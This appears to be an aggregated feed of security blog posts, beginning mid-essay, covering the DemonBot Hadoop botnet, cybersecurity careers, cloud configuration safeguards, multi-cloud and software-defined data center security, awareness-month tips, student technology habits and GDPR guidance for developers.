To begin this mindset change, organisations need to start thinking about security as an overlay on top of existing infrastructure. They also need to introduce a software-defined approach to data security, enabling a centralised orchestration of security policy. This centralised orchestration enforcing capabilities such as software-defined application access control, cryptographic segmentation, data-in-motion privacy and a software-defined perimeter, data is completely protected on its journey across any network, while hackers are restricted from moving laterally across the network once a breach has occurred. Additionally, adopting innovative approaches such as Layer 4 encryption which renders the data itself useless, and therefore worthless to hackers, without impacting the operational visibility of the enterprise network and data flows, will further ensure the protection of the organisation’s network.
The fact is that the industry has overcomplicated network security for too long. If the industry continues to try the same methods over and over again, without making any changes, then there is no chance of progression. It’s time for organisations to start afresh and adopt a new, simple software-defined security overlay approach.
A new bot called DemonBot is targeting Hadoop clusters to execute distributed denial-of-service (DDoS) attacks.
The Radware Threat Research Center recently observed a threat actor exploiting a Hadoop Yet Another Resource Negotiator (YARN) unauthenticated remote command execution. This method of attack enables the malicious agent to infect clusters of Hadoop, an open source distributed processing framework that helps big data apps run in clustered systems, with DemonBot. Upon successful infection, the threat connects to its command-and-control (C&C) server and transmits information about the infected device.
Why Cloud Infrastructure Servers Are Juicy Targets
The threat’s goal is to leverage infected cloud infrastructure servers to conduct DDoS attacks. At this juncture, it is not exhibiting worm-like behavior akin to Mirai. Instead, it relies on 70 exploit servers for distribution, infrastructure that helps it perform 1 million exploits every day.
That being said, Radware found DemonBot to be binary-compatible with most Internet of Things (IoT) devices, which means the threat could spread to other types of products.
DemonBot isn’t the first bot to target cloud infrastructure servers like Hadoop clusters. In early October, a security researcher reported on Twitter that handlers of the Sora IoT botnet attempted to exploit the same YARN abused by DemonBot.
Radware attributed the growing interest in Hadoop to the fact that cloud infrastructure servers allow bad actors to stage larger and more stable DDoS attacks using multiple vectors, such as User Datagram Protocol (UDP) and Transmission Control Protocol (TCP) floods.
How to Defend Against DemonBot
Security professionals can help protect their organizations against DemonBot by conducting a proper risk assessment on their cloud deployment. From there, they should enlist the help of penetration testers to map the vulnerabilities affecting their deployment.
Security teams should also look to invest in mitigation tools and services that specialize in defending against a DDoS attack.
The post DemonBot Targeting Hadoop Clusters to Perform DDoS Attacks appeared first on Security Intelligence.
Here’s some cool trivia for you: What profession currently has a zero-percent unemployment rate, pays an average of $116,000 a year, and is among the top in-demand jobs in the world? A lawyer? A pharmacist? A finance manager, perhaps?
Nope. The job we’re talking about is a cybersecurity specialist and, because of the increase in cyber attacks around the world, these professionals are highly employable.
According to numbers from the Bureau of Labor and Statistics, a career in cybersecurity is one of the most in-demand, high-paying professions today with an average salary of $116,000, or approximately $55.77 per hour. That’s nearly three times the national median income for full-time wage and salary workers. How’s that for job security?
Why is the demand so high? Sadly, because there are a lot of black hats (bad guys) out there who want our data — our user IDs, passwords, social security numbers, and credit card numbers. Every month it seems banks, hospitals, and major corporations are reporting security breaches, which has put the global cybersecurity talent an estimated deficit of two million professionals.
It’s exciting to see gifts and passions emerge in our kids as they grow and mature. If a child is good at math and sciences, we might point them toward some the medical field. If they a child shows an affinity in English and communication skills, maybe a law, teaching, or media career is in their future.
But what about a cybersecurity expert? Have you noticed any of these skills in your kids?
Flexible/creative problem solving
Collaborative, team player
A sense of duty, justice
Works well under pressure
Curious and perceptive
Technology/tech trend fan
Verbal and written communications
Most jobs in cybersecurity require a four-year bachelor’s degree in cybersecurity or a related field such as information technology or computer science. Students take coursework in programming and statistics, ethics, and computer forensics, among other courses.
First, if your child has some of the skills/personality traits mentioned, how do you start directing him or her toward this field? The first place to begin is in the home. Model smart cybersecurity habits. Talk about digital safety, the importance of protecting personal data and the trends in cybercrimes. In short, model and encourage solid digital citizenship and family security practices.
Second, bring up the possibility, or plant the seed. Be sure to encourage both boys and girls equally. Help your child find answers to his or her questions about careers in computer and data science, threat research, engineering and information on jobs such as cybersecurity analyst, vulnerability analyst, and penetration tester.
Third, read and share takeaways from the Winning The Game a McAfee report that investigates the key challenges facing the IT Security industry and the possible teen gaming link to a successful cybersecurity career.
CyberCompEx. A connection point for everything cybersecurity including forums, groups, news, jobs, and competition information.
CyberCorps® Scholarship for Service. SFS is a program providing scholarships and stipends to undergraduate and graduate students studying cybersecurity at participating institutions. Great for those who want to work in government.
CyberPatriot. This site is created by the Air Force Association (AFA) to inspire K-12 students toward careers in cybersecurity or other science, technology, engineering, and mathematics (STEM).
GenCyber. This is a summer cybersecurity camp for K-12 students and teachers that focuses on inspiring kids to direct their talents toward cybersecurity skills and closing the security skills gap.
National CyberWatch Center. The National CyberWatch Center is a consortium of higher education institutions, public and private businesses, and government agencies focused on advancing cybersecurity education and strengthening the workforce.
National Initiative for Cybersecurity Careers and Studies. NICCS provides information on cybersecurity training, formal education, and workforce development.
National Initiative for Cybersecurity Education. NICE is an initiative to energize and promote a robust network and an ecosystem of cybersecurity education, cybersecurity careers, training, and workforce development.
*Resource list courtesy of Stay Safe Online.
The post Have You Talked to Your Kids About a Career in Cybersecurity? appeared first on McAfee Blogs.
Configurable systems have a high level of flexibility and are better adapted to most customer needs, but their management isn’t a trivial task in complex cloud deployments.
The configuration management concept isn’t new and originated in the United States Department of Defense in the 1950s as a technical management discipline for hardware material items. In a software environment, it has a different meaning, but the concept remains the same.
Let’s take a closer look at why it’s so important in our system and how we handle it.
Administrators, support engineers or any other people who deal with services or products, like configuration. Product or service parameterization allows adjustment to customer needs exactly as the customer requires. This can be done by a small modification of default configuration or by enabling/disabling a feature. Of course, the default settings should be simple and meet the need in most cases, but they do not fit all of them.
As developers we hate configuration, it makes for messy code. Configuration creates complexity, and any parameter in it or its change adds additional testing. Since developers don’t rule the world, however, we need to make do. On the other hand, we are responsible for providing a stable and reliable service, so how do we find a happy medium?
The simple answer to that would be “more unit-testing” or “more testing” to account for all possible scenarios, right? Well, some managers would agree, but the real world is a little bit more complicated than a Q/A lab. Our R&D and test automation teams are already doing a great job, but it’s not always enough since there are practically infinite combinations of configurations, and testing alone cannot mitigate the risk.
We know that configuration validation should be done in a real-time environment, so the Imperva Incapsula engineering team created a few mechanisms for self-protection. These mechanisms ensure close to zero impact for our customers in production, by checking correctness and fast recovery in the face of errors.
In this post, we’ll describe a few of those mechanisms, some basic, like schema validation, others more complicated, like configuration snapshot management.
Let’s kick it off with a simple configuration flow.
Customer configuration is transferred from one agent to another by employing what we refer to as a “shield”. In each case, every agent ensures the configuration is correct. We do this to achieve two goals:
- Catch the problem as fast as possible, because early detection is crucial for a timely resolution
- Some shields have overlapping protection for better detection
Let’s take a closer look at these shields. Every configuration asset is protected by several shields as described in the following illustration but not necessarily by all of them. Each shield is described below.
Management Console Configuration Shield
The Imperva Incapsula Management Console is used by both customers and operations staff. Its job is to receive configuration changes via the user interface or API, store it in the configuration database and notify the next agent that a configuration change has occurred.
The Management Console performs the following validations:
- Schema correctness – configuration structure is correct for both database storage and runtime components. For example, data types validation.
- Semantic correctness – any changed or added configuration is validated under its scope. For example, model state changes.
- Data relationships – data should be correct relative to another component in the system. For example, customer site name or GRE tunnel IPs.
Once the problem is detected, the user is immediately notified and the configuration update is rejected.
Configuration Sandbox Shield
In addition to performing static validations, Imperva Incapsula also sandboxes configuration changes in a live system before propagating it to the production network. The goal of this step is to detect unexpected issues with the configuration.
The configuration is loaded into fully operational runtime nodes, which try to detect the problem, anomaly or incorrect behavior. Note that the runtime nodes do not serve customer traffic. In the unlikely event that a configuration error is detected, the configuration change is isolated and will not affect customer traffic.
As described in illustration, at this point, valid configuration changes reach production nodes and affect customer traffic. However, issues that result originate from unexpected traffic patterns can still show up. So, an additional shield is required to ensure that such issues are handled gracefully.
Runtime Node Configuration Shield
Runtime nodes implement the last protection point which allows them to recover from bad configuration changes, even ones that cause the process to abruptly terminate (crash). The mechanism keeps a Last Known Good (LKG) snapshot of the configuration repository and is able to revert to it when needed. As opposed to previous shields, this one operates at the repository level. We chose that design because it might be very complicated to discover a single bad configuration change and we want to recover as quick as possible.
This shield’s implementation covers the following stages:
- Background – the system maintains snapshots of LKG repositories
- Detection – the system detects issues with the repository
- Decision – the system decides whether a repository is safe to use or not
- Rollback – the system reverts to an LKG repository
- Recovery – once the configuration is fixed, the system recovers to the most recent version of the repository
This shield is our last line of defense, and we do not expect it to take action on a daily basis. However, if that occurs, our monitoring systems notify the relevant teams to immediately investigate and find the root cause of the issue, as described in our post: How to Tame “Monitorture” and Build a Developer-Friendly Monitoring Environment.
Runtime Node Configuration Shield Implementation
In this last section, I’d like to share some details about how we implemented the runtime node configuration shield.
We keep the configuration in files, so we wanted to find a solution at the file-system level. We evaluated several options for file-system snapshot management and decided to go with Btrfs storage, which is based on the copy-on-write (COW) principle. Btrfs has built-in snapshot functionality and meets our performance requirements.
Over Btrfs, we implemented a small open-source component, which is run as a service and creates snapshots for different repositories defined in our system. This component is generic and can be used by any product to achieve the same goal.
The following configuration is an example of possible repositories:
Configuration example of this service[/caption]
Repository represents the Btrfs device managed by snapper, while snapshot_level represents snapshot frequency and links to the latest snapshot taken under this snapshot level. Each repository can define several snapshot levels based on business logic or frequency of configuration changes.
The snapper creates a snapshot periodically based on configuration but stops if any defined “stoppers” exists.
Runtime components use master configuration until the configuration problem is detected. Once detected, the component tries to load the latest good snapshot configuration with links defined in the configuration. In addition, the stopper should be created or ordered to stop snapper functionality.
We believe that similar techniques can be used in any cloud service. These mechanisms help us provide a reliable service and we strive for a reality in which they will not be activated. But if they are, our customers can rest easy.
The post Read: How To Build Resilient Cloud Configuration Shields appeared first on Blog.
Cloud awareness and adoption continues to grow as more enterprises take advantage of the benefits that come with multiple cloud platforms. As this trend continues its upward trajectory, we see more tech vendors coming to market with new tools designed to address a variety of different challenges.
Whether you are switching up your multi-cloud strategy or starting from scratch, here are a few things your organization needs to know first about multi-cloud.
Determine what features will either make or break your multi-cloud strategy
When picking the best multi-cloud structure for your business, be bold. Build a vision for what you need cloud services to do for your company; worry less about “how” and more about the “why” and “what” you need from your providers. The reality is that top cloud providers in IaaS/PaaS and, separately, SaaS spaces are offering extremely versatile capabilities and compelling value. It is important to understand what features are make or break and which ones change the way your organization works when it comes to selecting vendors.
Outside of single requests for a new or different capability, your organization needs to rationalize the different needs for each down to “collections” of related needs. For example, consider SaaS for well-known, repeatable needs first, then look to move or re-deploy capability into IaaS or build natively in PaaS for efficient applications.
Security measurements that are important when architecting a multi-cloud structure
First and foremost, avoid looking at your new cloud infrastructure as a separate environment. It’s not merely a new data center, so an organization also needs to consider how switching to a cloud infrastructure will shift how the organization secures assets. Consider looking to resources like the MITRE ATT&CK matrix and the Center for Internet Security’s Basic and Foundational Controls list as a guide for answering this question: “In the future, how do I maintain unified visibility and security when I incorporate new cloud providers?”
For a successful multi-cloud migration, use your cloud access security layer and a platform that ultimately unifies your policy and threat identification approaches. Identity is another common challenge area. Moving to the cloud at scale often requires your organization to “clean up” your identity directory to be ready and accommodating of shared sign-on. By using an identity management and/or aggregation platform to expose identity to well-known cloud services, you will be able to ease the cloud implementation burden and threat exposure of any given provider.
It’s important to know that your organization’s compliance requirements are not mitigated or transmuted simply because the data has left your internal environment and entered the one your cloud provider(s) uses. As your organization matures, the way you manage and align your cloud provider’s capabilities to your compliance requirements should evolve accordingly.
Initially, ensure that your company requires business unit executives to apply or accept the risk of compliance obligations where service providers may not have every requirement. Your legal team should be a part of the initial purchase decisions, armed with technical knowledge to help identify potential “rogue” cloud services and policy guidelines that dissuade employees from adding services “on a credit card” without appropriate oversight.
As your organization gains more experience with the cloud, request that providers share copies of the SSAE16 attestations / audits. This, together with more formal due diligence processes, should become commonplace. Organizations looking to advance in this space would be well-advised to look at the Cloud Security Alliance’s STAR attestation and the associated Cloud Controls Matrix as a ready accelerator to benchmark cloud providers.
Approaching buy-in from exec/C-level on a multi-cloud strategy
Use of cloud services should reflect the strategic focus of the business. Technology leaders can leverage the benefits of these services to underpin initiatives in efficiency, bringing innovation to market and controlling costs. To strengthen this message, technology department heads should consider the metrics and operations adjustments that will allow them to demonstrate the enhanced value of the cloud beyond just the bottom line. If you are trying to get exec/C-level buy in, consider the following:
- How will you measure the speed of introducing new capabilities?
- Are new areas of value or product enhancement made possible through cloud services?
- How will the organization measure and control usage to hit your cost targets?
- How do you know whether your organization is getting what you have contracted for from cloud providers?
- Do you have a mechanism for commercial coverage of the organization when things go wrong?
Protect your organization and secure the cloud
Organizations will often “upgrade” in some areas of basic security (perimeter, basic request hygiene) when making the move to well-known cloud providers. How the overall security posture is affected depends heavily on the level of diligence that goes into onboarding new cloud providers. Implementing critical technical measures like the Cloud Access Security layer and policy around how the cloud is procured and technically implemented should drive basic control requirements.
We previously discussed the challenges of governing cloud and the maturity model that we use with customers to ascertain their readiness for new cloud providers.
As the number of cloud providers scales in the environment, your organization needs to assess and document them based on how much your organization depends on a given service and the sensitivity of the data those services will hold. Services that are prioritized higher on these two fronts should have increased organizational scrutiny and technical logging integration in order to maintain the overall defensive posture of the company.
As with any other technology trend, the missteps in making the transition to business and consumer cloud services have received outsized coverage. Take the time to dive into the “hows” and “whys” of early cloud breaches to avoid becoming a potential victim. A resource like the Cloud Security Alliance’s “Top Threats to Cloud Computing: Deep Dive” and McAfee’s report on “Practical Guidance and the State of Cloud Security” can be a great place to start.
Learning from someone else’s experiences is always highly preferred, though. After all, learning about cloud incident response after the fact can be a hard, costly lesson!
The post 5 Things Your Organization Needs to Know About Multi-Cloud appeared first on McAfee Blogs.
Don’t we all kinda secretly hope, even pretend, that our biggest fears are in the process of remedying themselves? Like believing that the police will know to stay close should we wander into a sketchy part of town. Or that our doors and windows will promptly self-lock should we forget to do so. Such a world would be ideal — and oh, so, peaceful — but it just isn’t reality. When it comes to making sure our families are safe we’ve got to be the ones to be aware, responsible, and take the needed action.
Our Shared Responsibility
This holds true in making the internet a safe place. As much as we’d like to pretend there’s a protective barrier between us and the bad guys online, there’s no single government entity that is solely responsible for securing the internet. Every individual must play his or her role in protecting their portion of cyberspace, including the devices and networks they use. And, that’s what October — National Cyber Security Awareness Month (NCSAM) — is all about.
At McAfee, we focus on these matters every day but this month especially, we are linking arms will safety organizations, bloggers, businesses, and YOU — parents, consumers, educators, and digital citizens — to zero in on ways we can all do our part to make the internet safe and secure for everyone. (Hey, sometimes the home team needs a huddle, right!?)
8 specific things you can do!
- Become a NCSAM Champion. The National Cyber Security Alliance (NCSAM) is encouraging everyone — individuals, schools, businesses, government organizations, universities — to sign up, take action, and make a difference in online safety and security. It’s free and simple to register. Once you sign up you will get an email with a toolbox packed with fun, shareable memes to post for #CyberAware October.
- Tap your social powers. Throughout October, share, share, share great content you discover. Use the hashtag #CyberAware, so the safety conversation reaches and inspires more people. Also, join the Twitter chat using the hashtag #ChatSTC each Thursday in October at 3 p.m., ET/Noon, PT. Learn, connect with other parents and safety pros, and chime in.
- Hold a family tech talk. Be even more intentional this month. Learn and discuss suggestions from STOP. THINK. CONNECT. on how each family member can protect their devices and information.
- Print it and post it: Print out a STOP. THINK. CONNECT. tip sheet and display it in areas where family members spend time online.
- Understand and execute the basics. Information is awesome. But how much of that information do we truly put into action? Take 10 minutes to read 10 Tips to Stay Safe Online and another 10 minutes to make sure you take the time to install a firewall, strengthen your passwords, and make sure your home network as secure as it can be.
- If you care — share! Send an email to friends and family informing them that October is National Cybersecurity Awareness Month and encourage them to visit staysafeonline.org for tips and resources.
- Turn on multi-factor authentication. Protect your financial, email and social media accounts with two-step authentication for passwords.
- Update, update, update! This overlooked but powerful way to shore up your devices is crucial. Update your software and turn on automatic updates to protect your home network and personal devices.
Isn’t it awesome to think that you aren’t alone in striving to keep your family’s digital life — and future — safe? A lot of people are working together during National Cyber Security Awareness Month to educate and be more proactive in blocking criminals online. Working together, no doubt, we’ll get there quicker and be able to create and enjoy a safer internet.
The post #CyberAware: Will You Help Make the Internet a Safe Place for Families? appeared first on McAfee Blogs.
For 57% of enterprise organizations in our latest survey on cloud adoption, IT infrastructure took the form of a hybrid cloud, i.e. a mix of public cloud infrastructure-as-a-service (IaaS) and some form of private cloud data center. At McAfee, we spend a lot of time speaking about the benefits of using public cloud infrastructure providers like AWS and Azure. We spend less time discussing private cloud, which today is increasingly software-defined, earning the name “software-defined data center” or SDDC.
Infrastructure designed to operate as an SDDC provides the flexibility of cloud with the most control possible over IT resources. That control enables well-defined security controls with the potential to rise above and beyond what many teams are used to having at their disposal in a traditional data center, particularly when it comes to micro-segmenting policy.
To start, the concept of software-defined data center describes an environment where compute, networking, and often storage are all virtualized and abstracted above the physical hardware they run on. VMware handles the largest share of these virtualized deployments, which is a natural extension of their long history of transforming single-purpose servers into far more cost-effective virtual server infrastructure. The big change here is adding network virtualization through their technology NSX, which frees the network from physical constraints and allows it to be software-defined.
In a physical network, your infrastructure has a perimeter which you allow traffic in/out of. This limits your control to the physical points where you can intercept that traffic. In a software-defined network (a critical part of a software-defined data center) your network can be controlled at every logical point in the virtual infrastructure. For a simple example, say you have 100 VMs running in 3 compliance-based groupings. Here is how your policy could be constructed at a high level in an SDDC:
- Group 1: PCI compliant storage. Every VM in this group is tagged for Group 1, and network traffic limited to internal IPs only.
- Group 2: GDPR compliant application with customer data. Again, each VM is tagged for its group to share the same policy, this time enforcing encryption and read-only access.
- Group 3: Mixed-use, general purpose VMs with varying compliance requirements. In this case, each VM needs its own policy. Some may be limited to single-IP access, others open to the internet. A per-VM policy effectively introduces micro-segmentation to your infrastructure.
The point of these basic examples is to clarify the opportunity that a software-defined data center has to fine-tune policy for your assets held on-premises. If you’re also running in AWS or Azure, then what you’ve kept on-premises likely consists of your most sensitive assets, which require the most stringent protection. Controlling policy down to the individual VM gives you this flexibility. Once you’re controlling policy at the VM-level, you can also monitor and control the communication between those VMs (i.e. east-west or intra-VM), stopping lateral threat movement from one VM to another within your data center.
If you’re in a state where certain assets simply can’t enter the public cloud, and you want to make improvements in your resource efficiency and protection strategy, you should consider building out a plan to completely virtualize your data center, including the network. To help you with that strategy, we partnered with VMware and research firm IDC to write a short paper on the security benefits of adopting a software-defined data center. You can read it here to dive deeper into this topic.
The post Moving to a Software-Defined Data Center and Its Impact on Security appeared first on McAfee Blogs.
You’ve loved, shaped, and equipped your child to succeed in college and move in day is finally here. But there’s still one variable that can turn your child’s freshman year upside down, and that’s technology.
That’s right, that essential laptop and indispensable smartphone your child owns could also prove to be his or her biggest headache if not secured and used responsibly. College students can be targets of identity theft, malware, online scams, credit card fraud, property theft, and internet addiction.
The other part of this new equation? You, parent, are no longer in the picture. Your child is now 100% on his or her own. Equipping time is over. Weekly tech monitoring and family chats are in the rearview mirror. Will they succeed? Of course, they will. But one last parenting chat on safety sure can’t hurt. Here are a couple of reminders to share with your college-bound kids.
7 Technology Habits for Students
1. Minimize use of public computers. Campuses rely on shared computers. Because campus networks aren’t always secure, this can open you up to identity theft. If you have to log on to a public computer be it a cafe, library, or lab, be sure to change any passwords each time you return. If you are working with a study group, don’t share passwords. Public devices can be prone to hackers seeking to steal login credentials and credit card numbers. If you do use public devices, get in the habit of browsing in the privacy mode. Clear browser history, cookies, and quit all applications before logging off.
2. Beware when shopping online. Online shopping is often the easiest way for students to purchase essentials. Be sure to use a secure internet connection when hitting that “purchase” button. Reputable sites encrypt data during transactions by using SSL technologies. Look for the tiny padlock icon in the address bar or a URL that begins with “https” (the “s” stands for secure) instead of “http.” Examine the site and look for misspellings, inconsistencies. Go with your instincts if you think a website is bogus, don’t risk the purchase. Online credit card fraud is on the rise, so beware.
3. Guard your privacy. College is a tough place to learn that not all people are trustworthy — even those who appear to be friends. Sadly, many kids learn about online theft the hard way. Never share passwords, credit card numbers, or student ID numbers. Be aware of shoulder surfing which is when someone peers over your shoulder to see what’s on your computer screen. Avoid leaving computer screens open in dorm rooms or libraries where anyone can check your browsing history, use an open screen, or access financial information. Also, never lend your laptop or tablet to someone else since it houses personal information and make sure that all of your screens are password protected.
4. Beware of campus crooks. Thieves troll college campuses looking for opportunities to steal smartphones, laptops, wearables, and tablets for personal use or resale. Don’t carry your tech around uncased or leave it unguarded. Conceal it in a backpack. Even if you feel comfortable in your new community, don’t leave your phone even for a few seconds to pick up your food or coffee at a nearby counter. If you are in the library or study lab and need a bathroom break, take your laptop with you. Thieves are swift, and you don’t want to lose a semester’s worth of work in a matter of seconds.
5. Use public Wi-Fi with caution. Everyone loves to meet at the coffee shop for study sessions — and that includes hackers. Yes, it’s convenient, but use public Wi-Fi with care. Consider using VPN software, which creates a secure private network and blocks people from accessing your laptop or activity. To protect yourself, be sure to change your passwords often. This is easy if you use a free password manager like True Key.
6. Social media = productivity killer. Be aware of your online time. Mindless surfing, internet games, and excessive video gaming with roommates can have an adverse effect on your grades as well as your mental health. Use online website blockers to help protect your study time.
7. Social media = career killer. We can all agree: College is a blast. However, keep the party photos and inappropriate captions offline. Your career will thank you. Remember: Most everything you do today is being captured or recorded – even if you’re not the one with the camera. The internet is forever, and a long-forgotten photo can make it’s way back around when you least expect it.
8. Don’t get too comfortable too fast. Until you understand who you can trust in your new community, consider locking your social media accounts. Disable GPS on mobile apps for security, don’t share home and dorm addresses, email, or phone numbers. While it may be the farthest thing from your mind right now — campus stalking case are real.
The post College Bound? 7 Important Technology Habits for Students appeared first on McAfee Blogs.
Application Developers develop GDPR compliant applications.
Developing GDPR Compliant Applications Guidance
- Part 1: A Developer's Guide to the GDPR
- Part 2: Application Privacy by Design
- Part 3: Minimizing Application Privacy Risk
The General Data Protection Regulation (GDPR) was created by the European Commission and Council to strengthen and unify Europe's data protection law, replacing the 1995 European Data Protection Directive. Although the GDPR is a European Union (EU) regulation, it applies to any organizations outside of Europe that handle the personal data of EU citizens. This includes the development of applications that are intended to process the personal information of EU citizens. Therefore, organizations that provide web applications, mobile apps, or traditional desktop applications that can indirectly process EU citizen's personal data or allow EU citizens sign in are subject to the GDPR's privacy obligations. Organizations face the prospect of powerful sanctions should applications fail to comply with the GDPR.
Part 1: A Developer's Guide to the GDPR
Part 1 summarizes the GDPR and explains how the privacy regulation impacts and applies to developing and supporting applications that are intended to be used by European Union citizens.
Part 2: Application Privacy by Design
Part 3: Minimizing Application Privacy Risk
Part 3 provides practical application development techniques that can alleviate an application's privacy risk.